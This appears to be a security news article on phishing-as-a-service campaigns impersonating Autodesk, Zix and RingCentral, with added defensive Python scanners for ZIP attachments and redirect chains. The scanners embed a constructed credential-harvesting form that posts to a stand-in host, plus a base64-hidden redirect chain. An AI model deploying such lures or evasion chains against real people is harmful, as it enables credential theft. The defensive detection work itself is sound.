Phishing campaigns targeting organisations globally have recently been observed using phishing-as-a-service (PhaaS) kits to evade detection and slip past security controls. These attacks can trick recipients into divulging sensitive information, including login credentials, financial data, and confidential documents. PhaaS kits, which let attackers craft and deploy phishing campaigns with little technical effort, are becoming increasingly popular among threat actors. The kits can be bought outright or leased on a subscription basis, which makes them an attractive option for attackers seeking to monetise their phishing efforts.

Autodesk Construction Cloud Phishing Attacks
One notable example of a phishing campaign involves the Autodesk Construction Cloud, a widely used collaboration platform in the construction industry. Attackers have been using the Tycoon PhaaS kit to impersonate trusted executives and send official-looking project notifications. The notifications appear legitimate, but they contain malicious links that lead to ZIP files. The HTML file inside the ZIP first shows a CAPTCHA screen and then a spoofed Microsoft login page designed to harvest credentials. Because the lure borrows the trust recipients place in Autodesk, and the link points at an archive rather than directly at a phishing page, the attack is hard for both recipients and link scanners to spot.
- Attackers impersonate trusted executives to gain credibility.
- The phishing campaign exploits the trust that recipients have in Autodesk.
- The HTML file inside the ZIP shows a CAPTCHA screen before the fake login page, which keeps automated scanners from reaching the credential-harvesting form.
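The ZIP-wrapped HTML lure described above is something a mail gateway can inspect before delivery. The following is an added example, not code from Barracuda or from the original article: it opens a ZIP attachment in memory, looks for HTML members, and reports the indicators the campaign description mentions (a CAPTCHA gate, a password field, a form that posts to an external host, Microsoft branding) plus the decode-at-runtime JavaScript pattern typical of HTML smuggling. The indicator strings, the member filename, the `collector.example` host and the sample HTML are all constructed for the example.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

# Indicators taken from the campaign description: a ZIP whose HTML member
# shows a CAPTCHA-style gate and then a spoofed Microsoft sign-in form.
# The strings and extensions below are this example's own choices.
BRAND_STRINGS = ("microsoft", "office 365", "outlook", "sign in to your account")
SUSPICIOUS_HTML_EXT = (".html", ".htm", ".shtml")


class FormScanner(HTMLParser):
    """Collect form actions and note whether a password input is present."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.has_password_input = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_input = True


def scan_html(html: str) -> list:
    """Return a list of human-readable findings for one HTML document."""
    findings = []
    scanner = FormScanner()
    scanner.feed(html)
    lowered = html.lower()
    if scanner.has_password_input:
        findings.append("password input in an HTML attachment")
    for action in scanner.form_actions:
        if re.match(r"https?://", action):
            findings.append(f"form posts credentials off-site to {action}")
    if any(s in lowered for s in BRAND_STRINGS):
        findings.append("Microsoft-branded strings in attachment")
    if "captcha" in lowered:
        findings.append("CAPTCHA gate in attachment (common bot-evasion step)")
    if re.search(r"atob\(|unescape\(|fromCharCode", html):
        findings.append("decode-at-runtime JavaScript (HTML smuggling pattern)")
    return findings


def scan_zip_attachment(blob: bytes) -> dict:
    """Return {member_name: [findings]} for every HTML member of a ZIP blob."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(SUSPICIOUS_HTML_EXT):
                continue
            html = zf.read(info).decode("utf-8", errors="replace")
            results[info.filename] = scan_html(html)
    return results


# Constructed sample lure (not a real kit file): CAPTCHA text, then a
# Microsoft-styled form that posts to an attacker-controlled host.
SAMPLE_HTML = """<html><body>
<div id="gate">Please complete the CAPTCHA to view the project notification</div>
<form id="login" action="https://collector.example/submit" method="post">
  <h1>Sign in to your account</h1>
  <input type="email" name="loginfmt">
  <input type="password" name="passwd">
</form>
<script>document.getElementById("login").style.display="none";</script>
</body></html>"""


def build_sample_zip() -> bytes:
    """Build the constructed ZIP attachment used to exercise the scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Project_Update_4471.html", SAMPLE_HTML)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for name, findings in scan_zip_attachment(build_sample_zip()).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

A gateway would run `scan_zip_attachment` over every archive attachment and quarantine, or at least rewrite as a warning, any message whose HTML member trips more than one indicator; a single hit such as the word "captcha" on its own is too noisy to block on.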
Zix Secure Message Centre Phishing Campaign
Another example of a phishing campaign involves the Zix Secure Message Centre, an encrypted email service popular among organisations in the healthcare, finance, legal, and government sectors. In this campaign the attackers mimic the Zix service to trick recipients into divulging sensitive information. Victims receive an email about a supposed secure message, with a link to click to view it. The link takes users to a fake Zix page where they are asked to enter their email address. They are then redirected to a fraudulent Microsoft login page designed to steal credentials.
- The phishing campaign exploits the trust that recipients have in the Zix Secure Message Centre.
- The fake Zix page is designed to mimic the real Zix service.
- The fake Zix page collects the recipient's email address first, then hands off to a fraudulent Microsoft login page that captures the password.
RingCentral Voicemail Phishing with EvilProxy
A recent phishing campaign involves attackers impersonating RingCentral, a widely used business communication service. Victims receive apparent voicemail notifications with personalised details, encouraging them to click a playback button. The link initiates multiple redirections: first to a known newsletter provider, then onwards to legitimate cloud hosting, and finally to a verification step, before concluding at a phishing site hosted by the EvilProxy PhaaS kit. Each hop sits on a reputable domain, so a scanner that only checks the first link sees nothing wrong. EvilProxy operates as an adversary-in-the-middle reverse proxy that relays the victim's session with the real Microsoft sign-in page, so it can capture not only the password but also the session established after two-factor authentication completes.
- The phishing campaign exploits the trust that recipients have in RingCentral.
- The attackers use multiple redirections to evade detection.
- The phishing site is hosted by the EvilProxy PhaaS kit.
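The redirect chain described above is the part a link scanner most often misses. The following is an added example, not code from Barracuda or from the original article: it peels nested destinations out of tracking-style links, where the real target is carried in a query parameter (plain, percent-encoded or base64), records the host at every hop, and flags a message whose lure claims one brand while the innermost URL lands somewhere else. The parameter names, the `newsletter-example.net`, `cloud-example.com` and `lure-example.org` hosts, and the sample link are all constructed for the example; where a hop is a server-side HTTP 30x rather than a query-string embed, this code cannot see through it and a sandboxed client would have to follow the redirect.

```python
import base64
import re
from urllib.parse import parse_qs, quote, unquote, urlparse

# Query-parameter names that redirector and click-tracking services commonly
# use to carry the real destination. This list is an assumption of the example,
# not an inventory of any particular provider.
TARGET_PARAMS = ("url", "u", "redirect", "redir", "target", "dest", "link", "to", "q")


def _looks_like_url(value: str) -> bool:
    return bool(re.match(r"https?://", value, re.I))


def _decode_candidate(value: str):
    """Return a URL hidden in a parameter value (plain, percent-encoded or
    URL-safe base64), or None if the value does not decode to a URL."""
    v = unquote(value)
    if _looks_like_url(v):
        return v
    try:
        padded = v + "=" * (-len(v) % 4)
        decoded = base64.urlsafe_b64decode(padded).decode("utf-8", errors="strict")
    except Exception:  # not base64, or not text: treat as an ordinary value
        return None
    return decoded if _looks_like_url(decoded) else None


def unwrap_redirect_chain(url: str, max_hops: int = 10) -> list:
    """Return the list of hosts from the link as delivered down to the
    innermost URL embedded in a query parameter. max_hops bounds loops."""
    hosts = []
    current = url
    for _ in range(max_hops):
        parsed = urlparse(current)
        hosts.append(parsed.netloc.lower())
        nxt = None
        for key, values in parse_qs(parsed.query).items():
            if key.lower() not in TARGET_PARAMS:
                continue
            for v in values:
                nxt = _decode_candidate(v)
                if nxt:
                    break
            if nxt:
                break
        if not nxt:
            break
        current = nxt
    return hosts


def brand_mismatch(url: str, brand_domains: set) -> bool:
    """True when the innermost host is not the brand the lure claims to be."""
    final_host = unwrap_redirect_chain(url)[-1]
    return not any(final_host == d or final_host.endswith("." + d) for d in brand_domains)


# Constructed sample link modelled on the chain above: click tracker ->
# cloud-hosted "verification" page (destination base64-encoded) -> lure.
FINAL_LURE = "https://login.lure-example.org/common/oauth2/authorize"
VERIFY_STEP = (
    "https://storage.cloud-example.com/verify.html?redirect="
    + base64.urlsafe_b64encode(FINAL_LURE.encode()).decode().rstrip("=")
)
SAMPLE_LINK = "https://click.newsletter-example.net/c?id=48213&u=" + quote(VERIFY_STEP, safe="")


if __name__ == "__main__":
    print(" -> ".join(unwrap_redirect_chain(SAMPLE_LINK)))
    print("brand mismatch:", brand_mismatch(SAMPLE_LINK, {"ringcentral.com"}))
```

The useful output is the whole chain rather than the final verdict: when the innermost host is a freshly registered domain and the hops in between are well-known newsletter and cloud providers, that shape alone is a strong signal, and the intermediate hosts are worth reporting to the providers being abused.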
Other Notable Threats
Researchers have identified further examples of credential theft and phishing tactics involving the Gabagool PhaaS kit, which abuses the file-sharing capabilities of the Notion.com platform by delivering phishing links within harmless-seeming PDF attachments. Meanwhile, campaigns were seen combining Microsoft SharePoint and Copilot branding to create believable ‘Document shared’ notifications, and using LogoKit to build Roundcube webmail lookalikes that warn of an expiring password.
| Phishing Kit | Attack Type | Target Sectors |
|---|---|---|
| Gabagool PhaaS kit | Credential theft and phishing | Finance, healthcare, legal, and government |
| EvilProxy PhaaS kit | Voicemail phishing and credential theft | Business and government sectors |
Mitigation and Protection
Barracuda advocates for multilayered security measures and employee awareness training to counter these evolving threats. The company’s Email Protection suite includes features such as Email Gateway Defence against phishing and malware, Impersonation Protection for social engineering attacks, Incident Response, and Domain Fraud Protection. According to Barracuda, the solution combines artificial intelligence and deep integration with Microsoft 365 to help guard organisations from highly targeted phishing and impersonation attacks.
“Phishing campaigns leveraging PhaaS kits are a growing concern for organisations worldwide. To protect against these threats, it’s essential to implement a multi-layered security strategy that includes email security, user awareness, and employee training. Our Email Protection suite offers a comprehensive solution to help organisations defend against phishing and impersonation attacks.”
Key Takeaways
- Phishing campaigns using PhaaS kits are becoming increasingly sophisticated and difficult to detect.
- Attackers are using various tactics, including impersonation, credential theft, and social engineering, to trick recipients into divulging sensitive information.
- Multilayered security measures and employee awareness training are essential to counter these evolving threats.
- Barracuda’s Email Protection suite offers a comprehensive solution to help organisations defend against phishing and impersonation attacks.
news is a contributor at AntiVirusDon. We are committed to providing well-researched, accurate, and valuable content to our readers.